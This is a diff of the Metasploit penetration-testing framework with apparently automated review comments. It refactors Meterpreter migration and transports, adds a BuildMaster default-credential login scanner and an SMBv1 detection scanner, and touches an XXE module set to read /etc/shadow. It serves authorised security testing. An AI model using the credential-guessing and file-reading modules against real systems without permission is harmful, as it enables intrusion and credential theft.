+ entry[:name] = user_field[0]
+ entry[:gid] = user_field[2]
+ entry[:users] = user_field[3]
+ groups << entry
+ end
 end
 return groups
 end
@@ -59,8 +62,11 @@ module Msf::Post::Unix
 user_dirs = []
 # get all user directories from /etc/passwd
- read_file("/etc/passwd").each_line do |passwd_line|
- user_dirs << passwd_line.split(/:/)[5]
+ passwd = '/etc/passwd'
+ if file_exist?(passwd)
+ read_file(passwd).each_line do |passwd_line|
+ user_dirs << passwd_line.split(/:/)[5]
+ end
 end
 # also list other common places for home directories in the event that
diff --git a/lib/msf/ui/console/command_dispatcher/modules.rb b/lib/msf/ui/console/command_dispatcher/modules.rb
index 6f4c26c074..c6c07ef26e 100644
--- a/lib/msf/ui/console/command_dispatcher/modules.rb
+++ b/lib/msf/ui/console/command_dispatcher/modules.rb
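Review bot: `file_exist?(group)` guards against a missing /etc/group but not an unreadable one; if `read_file` returns nil for a file the session cannot read (verify against the Post::File implementation for each session type), `read_file(group).split("\n")` still raises NoMethodError, so `cmd_out = read_file(group).to_s.split("\n")` is the safer form, and the same applies to `read_file(passwd).each_line` in the /etc/passwd hunk below. Entries are also not validated: a comment or blank line in /etc/group yields `{name: "#...", gid: nil, users: nil}`, so `next if l.strip.empty? || l.start_with?('#')` before building `entry` would keep junk out of the result. A one-line comment such as `# a missing /etc/group yields an empty list rather than raising` would document the new contract for callers.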
@@ -66,23 +66,26 @@ module Msf end def cmd_edit_help - msg = "Edit the currently active module" - msg = "#{msg} #{local_editor ? "with #{local_editor}" : "(LocalEditor or $VISUAL/$EDITOR should be set first)"}." - print_line "Usage: edit" + print_line "Usage: edit [file/to/edit.rb]" print_line - print_line msg - print_line "When done editing, you must reload the module with 'reload' or 'rerun'." + print_line "Edit a local file or the currently active module with #{local_editor}" + print_line "If a file path is specified it will automatically be reloaded after editing" + print_line "Otherwise, you can reload the active module with 'reload' or 'rerun'." print_line end # # Edit the currently active module # - def cmd_edit - if active_module - editor = local_editor - path = active_module.file_path + def cmd_edit(*args) + if args.length > 0 + path = args[0] + elsif active_module + path = active_module.file_path + end + if path + editor = local_editor if editor.nil? editor = 'vim' print_warning("LocalEditor or $VISUAL/$EDITOR should be set. Falling back on #{editor}.") @@ -90,6 +93,10 @@ module Msf print_status("Launching #{editor} #{path}") system(editor, path) + + if args.length > 0 + load args[0] + end else print_error('Nothing to edit -- try using a module first.') end diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb index 329924f038..69d509ef89 100644 --- a/lib/rex/post/meterpreter/client_core.rb +++ b/lib/rex/post/meterpreter/client_core.rb 
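Review bot: `cmd_edit_help` now interpolates `local_editor` straight into the text, so when neither LocalEditor nor $VISUAL/$EDITOR is set the line reads `...currently active module with ` followed by nothing, whereas the removed code printed a hint in that case; keep the fallback, e.g. `print_line "Edit a local file or the currently active module with #{local_editor || 'vim (set LocalEditor or $VISUAL/$EDITOR to change)'}"`. The help also says a file path "will automatically be reloaded", but `cmd_edit` accepts any path, not only a previously loaded module, so "loaded" is the accurate word.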
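Review bot: `load args[0]` receives the path verbatim, so a relative argument such as `edit foo.rb` opens `./foo.rb` in the editor but Ruby's `load` then resolves `foo.rb` against $LOAD_PATH and may execute a different file; use `load File.expand_path(args[0])`. A file that fails to parse currently raises out of the dispatcher, so wrap it: `begin; load File.expand_path(args[0]); rescue ScriptError, StandardError => e; print_error("Failed to load #{args[0]}: #{e.message}"); end` (LoadError and SyntaxError are ScriptError, not StandardError, so a bare `rescue => e` would miss them). The return value of `system(editor, path)` is ignored, so the file is also loaded when the editor exits non-zero; checking it before loading avoids executing a half-saved file. Since `load` runs arbitrary Ruby with the framework's privileges, a comment stating that this is intentionally operator-trusted input would save the next reviewer the question.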
@@ -34,24 +34,12 @@ module Meterpreter ### class ClientCore < Extension - UNIX_PATH_MAX = 108 - DEFAULT_SOCK_PATH = "/tmp/meterpreter.sock" - - METERPRETER_TRANSPORT_SSL = 0 - METERPRETER_TRANSPORT_HTTP = 1 - METERPRETER_TRANSPORT_HTTPS = 2 - - TIMEOUT_SESSION = 24*3600*7 # 1 week - TIMEOUT_COMMS = 300 # 5 minutes - TIMEOUT_RETRY_TOTAL = 60*60 # 1 hour - TIMEOUT_RETRY_WAIT = 10 # 10 seconds - - VALID_TRANSPORTS = { - 'reverse_tcp' => METERPRETER_TRANSPORT_SSL, - 'reverse_http' => METERPRETER_TRANSPORT_HTTP, - 'reverse_https' => METERPRETER_TRANSPORT_HTTPS, - 'bind_tcp' => METERPRETER_TRANSPORT_SSL - } + VALID_TRANSPORTS = [ + 'reverse_tcp', + 'reverse_http', + 'reverse_https', + 'bind_tcp' + ] include Rex::Payloads::Meterpreter::UriChecksum 
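Review bot: Deleting `TIMEOUT_SESSION`, `TIMEOUT_COMMS`, `TIMEOUT_RETRY_*`, `UNIX_PATH_MAX`, `DEFAULT_SOCK_PATH` and the `METERPRETER_TRANSPORT_*` constants from ClientCore is a public-API break for any out-of-tree module, plugin or resource script that referenced them (this commit moves the framework's own users to `Msf::Sessions::MeterpreterOptions`); consider leaving deprecated aliases for a release, e.g. `TIMEOUT_SESSION = Msf::Sessions::MeterpreterOptions::TIMEOUT_SESSION`, or at least call the removal out in the changelog. `VALID_TRANSPORTS` also changes from a Hash to an Array, so any remaining `VALID_TRANSPORTS[...]` or `has_key?` caller outside this file (the `transport` console command is the obvious place to check) would now return nil or raise. While touching it, freeze the literal (`].freeze`) so a caller cannot mutate the whitelist.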
@@ -577,46 +565,12 @@ class ClientCore < Extension raise RuntimeError, 'Cannot migrate into current process', caller end - if client.platform == 'linux' - if writable_dir.to_s.strip.empty? - writable_dir = tmp_folder - end - - stat_dir = client.fs.filestat.new(writable_dir) - - unless stat_dir.directory? - raise RuntimeError, "Directory #{writable_dir} not found", caller - end - # Rex::Post::FileStat#writable? isn't available - end - migrate_stub = generate_migrate_stub(target_process) migrate_payload = generate_migrate_payload(target_process) # Build the migration request request = Packet.create_request('core_migrate') - if client.platform == 'linux' - socket_path = File.join(writable_dir, Rex::Text.rand_text_alpha_lower(5 + rand(5))) - - if socket_path.length > UNIX_PATH_MAX - 1 - raise RuntimeError, 'The writable dir is too long', caller - end - - pos = migrate_payload.index(DEFAULT_SOCK_PATH) - - if pos.nil? - raise RuntimeError, 'The meterpreter binary is wrong', caller - end - - migrate_payload[pos, socket_path.length + 1] = socket_path + "\x00" - - ep = elf_ep(migrate_payload) - request.add_tlv(TLV_TYPE_MIGRATE_BASE_ADDR, 0x20040000) - request.add_tlv(TLV_TYPE_MIGRATE_ENTRY_POINT, ep) - request.add_tlv(TLV_TYPE_MIGRATE_SOCKET_PATH, socket_path, false, client.capabilities[:zlib]) - end - request.add_tlv(TLV_TYPE_MIGRATE_PID, target_pid) request.add_tlv(TLV_TYPE_MIGRATE_PAYLOAD_LEN, migrate_payload.length) request.add_tlv(TLV_TYPE_MIGRATE_PAYLOAD, migrate_payload, false, client.capabilities[:zlib]) @@ -722,11 +676,8 @@ class ClientCore < Extension # Indicates if the given transport is a valid transport option. # def valid_transport?(transport) - if transport - VALID_TRANSPORTS.has_key?(transport.downcase) - else - false - end + return false if transport.nil? + VALID_TRANSPORTS.include?(transport.downcase) end # 
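Review bot: With the Linux branch removed, `migrate`'s `writable_dir` argument (declared in the signature above this hunk) appears to have no remaining reader, and a Linux session now falls through to `generate_migrate_payload`, which this commit changes to raise `RuntimeError, "Unsupported platform 'linux'"` only after `generate_migrate_stub` has run; if dropping Linux migration is intentional, state it in the method's doc comment and fail early with a clearer message, e.g. `raise RuntimeError, 'Migration is not supported on this platform', caller unless client.platform == 'windows'` placed before the stub is generated. The method's start and end lie outside this hunk, so whether the unused parameter was also removed from the signature cannot be seen here.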
@@ -830,11 +781,11 @@ private opts[:lhost] = nil end - transport = VALID_TRANSPORTS[opts[:transport]] + transport = opts[:transport].downcase request = Packet.create_request(method) - scheme = opts[:transport].split('_')[1] + scheme = transport.split('_')[1] url = "#{scheme}://#{opts[:lhost]}:#{opts[:lport]}" if opts[:luri] && opts[:luri].length > 0 @@ -864,7 +815,7 @@ private end # do more magic work for http(s) payloads - unless opts[:transport].ends_with?('tcp') + unless transport.ends_with?('tcp') if opts[:uri] url << '/' unless opts[:uri].start_with?('/') url << opts[:uri] @@ -878,7 +829,7 @@ private opts[:ua] ||= 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)' request.add_tlv(TLV_TYPE_TRANS_UA, opts[:ua]) - if transport == METERPRETER_TRANSPORT_HTTPS && opts[:cert] + if transport == 'reverse_https' && opts[:cert] hash = Rex::Socket::X509Certificate.get_cert_file_hash(opts[:cert]) request.add_tlv(TLV_TYPE_TRANS_CERT_HASH, hash) end @@ -902,24 +853,7 @@ private request.add_tlv(TLV_TYPE_TRANS_TYPE, transport) request.add_tlv(TLV_TYPE_TRANS_URL, url) - return request - end - - - # - # Create a full migration payload specific to the target process. - # - def generate_migrate_payload(target_process) - case client.platform - when 'windows' - blob = generate_migrate_windows_payload(target_process) - when 'linux' - blob = generate_migrate_linux_payload - else - raise RuntimeError, "Unsupported platform '#{client.platform}'" - end - - blob + request end # 
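Review bot: `transport = opts[:transport].downcase` raises NoMethodError when `opts[:transport]` is nil, whereas the replaced `VALID_TRANSPORTS[...]` lookup merely yielded nil; unless a `valid_transport?` check runs earlier in this method (its start is outside the hunk), guard it, e.g. `transport = opts[:transport].to_s.downcase`. The same local now reaches `request.add_tlv(TLV_TYPE_TRANS_TYPE, transport)` in the -902 hunk as a String rather than the former integer constant, so `TLV_TYPE_TRANS_TYPE` must be declared with a string meta-type on both the framework and the payload side. That declaration is not part of this diff and presumably lands with the payload-side update; a one-line comment at the `add_tlv` call recording that dependency would help anyone debugging a mismatched session.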
@@ -945,34 +879,18 @@ private end # - # Create a full Linux-specific migration payload specific to the target process. + # Create a full migration payload specific to the target process. # - def generate_migrate_linux_payload - MetasploitPayloads.read('meterpreter', 'msflinker_linux_x86.bin') - end - - # - # Determine the elf entry poitn for the given payload. - # - def elf_ep(payload) - elf = Rex::ElfParsey::Elf.new( Rex::ImageSource::Memory.new( payload ) ) - ep = elf.elf_header.e_entry - return ep - end - - # - # Get the tmp folder for the session. - # - def tmp_folder - tmp = client.sys.config.getenv('TMPDIR') - - if tmp.to_s.strip.empty? - tmp = '/tmp' + def generate_migrate_payload(target_process) + case client.platform + when 'windows' + blob = generate_migrate_windows_payload(target_process) + else + raise RuntimeError, "Unsupported platform '#{client.platform}'" end - tmp + blob end - end end; end; end diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb index 53a18e1aa3..83aa6694da 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb @@ -170,10 +170,7 @@ class Config ret = [] res = client.send_request(req) res.each(TLV_TYPE_PRIVILEGE) do |p| - ret << { - priv: p.get_tlv_value(TLV_TYPE_PRIVILEGE_NAME), - enabled: p.get_tlv_value(TLV_TYPE_PRIVILEGE_ENABLED), - } + ret << p.value end ret end diff --git a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb index 6ec7d0b180..5a00e8a111 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb 
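Review bot: The relocated `generate_migrate_payload` assigns the result of the `case` to a `blob` temporary only to return it on the next line; since `case` is an expression and the `else` branch raises, the method can return the `case` directly with `when 'windows' then generate_migrate_windows_payload(target_process)` and no trailing `blob`. The header comment above it could also state that Windows is currently the only supported platform and that other platforms raise RuntimeError, which is the contract `migrate` now relies on.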
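Review bot: `ret << p.value` changes the return type of `getprivs` from an array of `{priv:, enabled:}` hashes to an array of strings, and nothing in the hunk documents that; any caller other than the console dispatcher updated in this commit that still does `priv[:priv]` will now get nil or a TypeError. Add a YARD line above the method (its `def` is outside the hunk), e.g. `# @return [Array<String>] names of the enabled privileges reported by the session`. The `ret = []` / `<<` / `ret` pattern could also be `res.each(TLV_TYPE_PRIVILEGE).map(&:value)` if `each` there returns an Enumerable, which I cannot confirm from this view.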
@@ -16,9 +16,7 @@ TLV_TYPE_HANDLE = TLV_META_TYPE_QWORD | 600 TLV_TYPE_INHERIT = TLV_META_TYPE_BOOL | 601 TLV_TYPE_PROCESS_HANDLE = TLV_META_TYPE_QWORD | 630 TLV_TYPE_THREAD_HANDLE = TLV_META_TYPE_QWORD | 631 -TLV_TYPE_PRIVILEGE = TLV_META_TYPE_GROUP | 632 -TLV_TYPE_PRIVILEGE_NAME = TLV_META_TYPE_STRING | 633 -TLV_TYPE_PRIVILEGE_ENABLED = TLV_META_TYPE_BOOL | 634 +TLV_TYPE_PRIVILEGE = TLV_META_TYPE_STRING | 632 ## # diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb index 054ead9fa6..1dc678cc67 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb @@ -142,7 +142,7 @@ class Console::CommandDispatcher::Core print_line(@@pivot_opts.usage) print_line print_line('Supported pivot types:') - print_line(' - pipe (using named pipes over SMB)') + print_line(' - pipe (using named pipes over SMB)') print_line('Supported arhiectures:') @@pivot_supported_archs.each do |a| print_line(' - ' + a) @@ -757,7 +757,7 @@ class Console::CommandDispatcher::Core # Arguments for transport switching # @@transport_opts = Rex::Parser::Arguments.new( - '-t' => [true, "Transport type: #{Rex::Post::Meterpreter::ClientCore::VALID_TRANSPORTS.keys.join(', ')}"], + '-t' => [true, "Transport type: #{Rex::Post::Meterpreter::ClientCore::VALID_TRANSPORTS.join(', ')}"], '-l' => [true, 'LHOST parameter (for reverse transports)'], '-p' => [true, 'LPORT parameter'], '-i' => [true, 'Specify transport by index (currently supported: remove)'], diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb index c1d394bca0..5e7e987eda 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb 
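Review bot: `TLV_TYPE_PRIVILEGE` keeps type id 632 but switches its meta type from GROUP to STRING, so a framework running this code against a session whose payload still sends the group form will misparse the getprivs response rather than fail with a clear error. A short comment above the constant recording that the string form requires the matching payload-side change, e.g. `# STRING since the matching metasploit-payloads release; earlier payloads send a GROUP with NAME/ENABLED children`, would make a mismatched-session report much quicker to diagnose.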
@@ -899,12 +899,12 @@ class Console::CommandDispatcher::Stdapi::Sys 'Header' => 'Enabled Process Privileges', 'Indent' => 0, 'SortIndex' => 1, - 'Columns' => ['Priv Name', 'Enabled'] + 'Columns' => ['Name'] ) privs = client.sys.config.getprivs client.sys.config.getprivs.each do |priv| - table << [priv[:priv], priv[:enabled].to_s] + table << [priv] end print_line diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index cb1c245860..b3c110bb1e 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -191,9 +191,9 @@ class Client # Closes the connection to the remote server. # def close - if (self.conn) + if self.conn && !self.conn.closed? self.conn.shutdown - self.conn.close unless self.conn.closed? + self.conn.close end self.conn = nil diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 3d2a99241b..daa3bade99 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -70,7 +70,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.3.7' + spec.add_runtime_dependency 'metasploit-payloads', '1.3.8' # Needed for the next-generation POSIX Meterpreter spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.2.2' # Needed by msfgui and other rpc components diff --git a/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb b/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb index 8a4d8c337a..b9bf75753f 100644 --- a/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb +++ b/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb 
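Review bot: `'SortIndex' => 1` now points at a column that no longer exists once `'Columns'` shrinks to `['Name']`, so the table either sorts on nil or not at all; it should become `'SortIndex' => 0`. In the same hunk the context lines assign `privs = client.sys.config.getprivs` and then iterate `client.sys.config.getprivs.each`, sending the request to the session twice and leaving `privs` unused; the loop should read `privs.each do |priv|`.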
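Review bot: In `close`, if `self.conn.shutdown` raises (a socket the peer has already torn down can fail shutdown, and SSL wrappers can raise on it as well), the new code skips `self.conn.close` and the `self.conn = nil` that follows outside the hunk, so the descriptor lingers until GC and `conn` still looks open to the next caller. Wrapping the pair in `begin`/`ensure` makes the close unconditional while still attempting the orderly shutdown first. The method's `self.conn = nil` and `end` lie after the hunk.
```ruby
if self.conn && !self.conn.closed?
  begin
    self.conn.shutdown
  ensure
    self.conn.close
  end
end
# … unchanged: self.conn = nil …
```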
@@ -98,7 +98,7 @@ class MetasploitModule < Msf::Auxiliary @versions.each do |version| print_status("#{host}:#{rport} fuzzing version #{version} control messages (mode 6)") @mode_6_operations.each do |op| - request = Rex::Proto::NTP.ntp_control(version, op) + request = Rex::Proto::NTP.ntp_control(version, op).to_binary_s what = "#{request.size}-byte version #{version} mode 6 op #{op} message" vprint_status("#{host}:#{rport} probing with #{request.size}-byte #{what}") responses = probe(host, datastore['RPORT'].to_i, request) @@ -114,7 +114,7 @@ class MetasploitModule < Msf::Auxiliary print_status("#{host}:#{rport} fuzzing version #{version} private messages (mode 7)") @mode_7_implementations.each do |implementation| @mode_7_request_codes.each do |request_code| - request = Rex::Proto::NTP.ntp_private(version, implementation, request_code, "\0" * 188) + request = Rex::Proto::NTP.ntp_private(version, implementation, request_code, "\0" * 188).to_binary_s what = "#{request.size}-byte version #{version} mode 7 imp #{implementation} req #{request_code} message" vprint_status("#{host}:#{rport} probing with #{request.size}-byte #{what}") responses = probe(host, datastore['RPORT'].to_i, request) @@ -164,6 +164,7 @@ class MetasploitModule < Msf::Auxiliary # TODO: is there a better way to pick this size? Should more than one be tried? request.payload = SecureRandom.random_bytes(16) end + request = request.to_binary_s what = "#{request.size}-byte #{short ? 'short ' : nil}version #{version} mode #{mode} message" vprint_status("#{host}:#{rport} probing with #{what}") responses = probe(host, datastore['RPORT'].to_i, request) diff --git a/modules/auxiliary/gather/emc_cta_xxe.rb b/modules/auxiliary/gather/emc_cta_xxe.rb index 50db85b880..e34a632f26 100644 --- a/modules/auxiliary/gather/emc_cta_xxe.rb +++ b/modules/auxiliary/gather/emc_cta_xxe.rb 
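Review bot: The `.to_binary_s` serialization is now repeated at three call sites, and in the -164 hunk `request = request.to_binary_s` rebinds a name that was a BinData record a few lines earlier (`request.payload = ...`) to a String, so `request.size` in the message below refers to a different type than the `request` above it. Serializing once inside `probe` (which is outside the hunk and takes the request as its last argument) would remove the repetition; failing that, use a distinct name such as `data = request.to_binary_s` and pass `data` to `probe` and the status message.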
@@ -30,10 +30,10 @@ class MetasploitModule < Msf::Auxiliary [ Opt::RPORT(443), OptBool.new('SSL', [true, 'Use SSL', true]), - OptString.new('SSLVersion', [true, 'SSL version', 'TLS1']), OptString.new('TARGETURI', [ true, "Base directory path", '/']), OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/shadow"]), - ]) + ] + ) end def run diff --git a/modules/auxiliary/scanner/http/buildmaster_login.rb b/modules/auxiliary/scanner/http/buildmaster_login.rb new file mode 100644 index 0000000000..b29d37dc1a --- /dev/null +++ b/modules/auxiliary/scanner/http/buildmaster_login.rb 
@@ -0,0 +1,96 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::AuthBrute + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Inedo BuildMaster Login Scanner', + 'Description' => %{ + This module will attempt to authenticate to BuildMaster. There is a default user 'Admin' + which has the default password 'Admin'. + }, + 'Author' => [ 'James Otten ' ], + 'License' => MSF_LICENSE, + 'DefaultOptions' => { 'VERBOSE' => true }) + ) + + register_options( + [ + Opt::RPORT(81), + OptString.new('USERNAME', [false, 'Username to authenticate as', 'Admin']), + OptString.new('PASSWORD', [false, 'Password to authenticate with', 'Admin']) + ] + ) + end + + def run_host(ip) + return unless buildmaster? + + each_user_pass do |user, pass| + do_login(user, pass) + end + end + + def buildmaster? 
+ begin + res = send_request_cgi('uri' => '/log-in') + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE + print_error("#{peer} - HTTP Connection Failed") + return false + end + + if res && res.code == 200 && res.body.include?('BuildMaster_Version') + version = res.body.scan(%r{(.*)}).flatten.first + print_good("#{peer} - Identified BuildMaster #{version}") + return true + else + print_error("#{peer} - Application does not appear to be BuildMaster") + return false + end + end + + def login_succeeded?(res) + if res && res.code == 200 + body = JSON.parse(res.body) + return body.key?('succeeded') && body['succeeded'] + end + false + rescue + false + end + + def do_login(user, pass) + print_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + begin + res = send_request_cgi( + { + 'uri' => '/0x44/BuildMaster.Web.WebApplication/Inedo.BuildMaster.Web.WebApplication.Pages.LogInPage/LogIn', + 'method' => 'POST', + 'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' }, + 'vars_post' => + { + 'userName' => user, + 'password' => pass + } + } + ) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE + vprint_error("#{peer} - HTTP Connection Failed...") + return :abort + end + + if login_succeeded?(res) + print_good("SUCCESSFUL LOGIN - #{peer} - #{user.inspect}:#{pass.inspect}") + store_valid_credential(user: user, private: pass) + else + print_error("FAILED LOGIN - #{peer} - #{user.inspect}:#{pass.inspect}") + end + end +end diff --git a/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb b/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb index 664e90f57e..6d103377aa 100644 --- a/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb +++ b/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb 
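Review bot: `do_login` keeps iterating remaining passwords for a user after `store_valid_credential` succeeds; AuthBrute honours the block's return value, so add `return :next_user` after the `print_good` branch so a found credential stops further guesses against that account. `login_succeeded?` rescues every StandardError into `false`, which also hides bugs unrelated to malformed responses; narrow it to `rescue JSON::ParserError`. The version capture in `buildmaster?` appears here as `%r{(.*)}`, which would swallow the rest of the body; if the surrounding markup was lost in rendering ignore this, otherwise anchor the pattern to the element that carries the version.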
@@ -13,23 +13,18 @@ class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::AuthBrute def initialize - super( - 'Name' => 'Nessus NTP Login Utility', - 'Description' => 'This module attempts to authenticate to a Nessus NTP service.', - 'Author' => [ 'Vlatko Kosturjak ' ], - 'License' => MSF_LICENSE - ) - register_options( - [ - Opt::RPORT(1241), - OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false]) - ]) - - register_advanced_options( - [ - OptBool.new('SSL', [ true, "Negotiate SSL for outgoing connections", true]), - OptString.new('SSLVersion', [ true, " Specify the version of SSL that should be used", "TLS1"]) - ]) + super( + 'Name' => 'Nessus NTP Login Utility', + 'Description' => 'This module attempts to authenticate to a Nessus NTP service.', + 'Author' => [ 'Vlatko Kosturjak ' ], + 'License' => MSF_LICENSE + ) + register_options( + [ + Opt::RPORT(1241), + OptBool.new('BLANK_PASSWORDS', "Try blank passwords for all users") + ] + ) end def run_host(ip) diff --git a/modules/auxiliary/scanner/openvas/openvas_omp_login.rb b/modules/auxiliary/scanner/openvas/openvas_omp_login.rb index 5bf19b584c..86da3f4c9f 100644 --- a/modules/auxiliary/scanner/openvas/openvas_omp_login.rb +++ b/modules/auxiliary/scanner/openvas/openvas_omp_login.rb 
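Review bot: Removing the advanced `OptBool.new('SSL', [true, ..., true])` changes the module's effective default: the Tcp mixin registers SSL as false unless the module overrides it, so unless something outside this hunk sets it the scanner will now talk plaintext to a service that expects TLS. If the intent is to keep TLS on by default, add `'DefaultOptions' => { 'SSL' => true }` to the `super` hash; the same applies to the two OpenVAS login hunks that follow (-10 in openvas_omp_login.rb and -10 in openvas_otp_login.rb). Separately, this hunk rewrites BLANK_PASSWORDS as `OptBool.new('BLANK_PASSWORDS', "Try blank passwords for all users")`, dropping the explicit `false` default and differing from the array form the two OpenVAS hunks keep; pick one form for all three.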
@@ -10,23 +10,18 @@ class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::AuthBrute def initialize - super( - 'Name' => 'OpenVAS OMP Login Utility', - 'Description' => 'This module attempts to authenticate to an OpenVAS OMP service.', - 'Author' => [ 'Vlatko Kosturjak ' ], - 'License' => MSF_LICENSE - ) - register_options( - [ - Opt::RPORT(9390), - OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false]) - ]) - - register_advanced_options( - [ - OptBool.new('SSL', [ true, "Negotiate SSL for outgoing connections", true]), - OptString.new('SSLVersion', [ true, " Specify the version of SSL that should be used", "TLS1"]) - ]) + super( + 'Name' => 'OpenVAS OMP Login Utility', + 'Description' => 'This module attempts to authenticate to an OpenVAS OMP service.', + 'Author' => [ 'Vlatko Kosturjak ' ], + 'License' => MSF_LICENSE + ) + register_options( + [ + Opt::RPORT(9390), + OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false]) + ] + ) end def run_host(ip) diff --git a/modules/auxiliary/scanner/openvas/openvas_otp_login.rb b/modules/auxiliary/scanner/openvas/openvas_otp_login.rb index 26a8ce7937..52941770b7 100644 --- a/modules/auxiliary/scanner/openvas/openvas_otp_login.rb +++ b/modules/auxiliary/scanner/openvas/openvas_otp_login.rb 
@@ -10,23 +10,18 @@ class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::AuthBrute def initialize - super( - 'Name' => 'OpenVAS OTP Login Utility', - 'Description' => 'This module attempts to authenticate to an OpenVAS OTP service.', - 'Author' => [ 'Vlatko Kosturjak ' ], - 'License' => MSF_LICENSE - ) - register_options( - [ - Opt::RPORT(9391), - OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false]) - ]) - - register_advanced_options( - [ - OptBool.new('SSL', [ true, "Negotiate SSL for outgoing connections", true]), - OptString.new('SSLVersion', [ true, " Specify the version of SSL that should be used", "TLS1"]) - ]) + super( + 'Name' => 'OpenVAS OTP Login Utility', + 'Description' => 'This module attempts to authenticate to an OpenVAS OTP service.', + 'Author' => [ 'Vlatko Kosturjak ' ], + 'License' => MSF_LICENSE + ) + register_options( + [ + Opt::RPORT(9391), + OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false]) + ] + ) end def run_host(ip) diff --git a/modules/auxiliary/scanner/smb/smb1.rb b/modules/auxiliary/scanner/smb/smb1.rb new file mode 100644 index 0000000000..0e52f9f879 --- /dev/null +++ b/modules/auxiliary/scanner/smb/smb1.rb 
@@ -0,0 +1,76 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + # Exploit mixins should go first + include Msf::Exploit::Remote::Tcp + + # Scanner mixin should be near last + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + # Aliases for common classes + SIMPLE = Rex::Proto::SMB::SimpleClient + XCEPT = Rex::Proto::SMB::Exceptions + CONST = Rex::Proto::SMB::Constants + + def initialize + super( + 'Name' => 'SMBv1 Protocol Detection', + 'Description' => 'Detect systems that support the SMBv1 protocol', + 'Author' => 'Chance Johnson @loftwing', + 'License' => MSF_LICENSE + ) + + register_options([ Opt::RPORT(445) ]) + end + + # Modified from smb2 module by @hdm + # Fingerprint a single host + def run_host(ip) + begin + connect + + # Only accept NT LM 0.12 dialect and WfW3.0 + dialects = ['PC NETWORK PROGRAM 1.0', + 'LANMAN1.0', + 'Windows for Workgroups 3.1a', + 'LM1.2X002', + 'LANMAN2.1', + 'NT LM 0.12'] + data = dialects.collect { |dialect| "\x02" + dialect + "\x00" }.join('') + + pkt = Rex::Proto::SMB::Constants::SMB_NEG_PKT.make_struct + pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NEGOTIATE + pkt['Payload']['SMB'].v['Flags1'] = 0x08 + pkt['Payload']['SMB'].v['Flags2'] = 0xc801 + pkt['Payload'].v['Payload'] = data + + pkt['Payload']['SMB'].v['ProcessID'] = rand(0x10000) + pkt['Payload']['SMB'].v['MultiplexID'] = rand(0x10000) + + sock.put(pkt.to_s) + res = sock.get_once + # expecting \xff instead of \xfe + if res && res.index("\xffSMB") + print_good("#{ip} supports SMBv1 dialect.") + report_note( + host: ip, + proto: 'tcp', + sname: 'smb1', + port: rport, + type: "supports SMB 1" + ) + end + rescue ::Rex::ConnectionError + rescue EOFError + rescue Errno::ECONNRESET + rescue ::Exception => e + print_error("#{rhost}: #{e.class} #{e} #{e.backtrace}") + ensure + disconnect + end + 
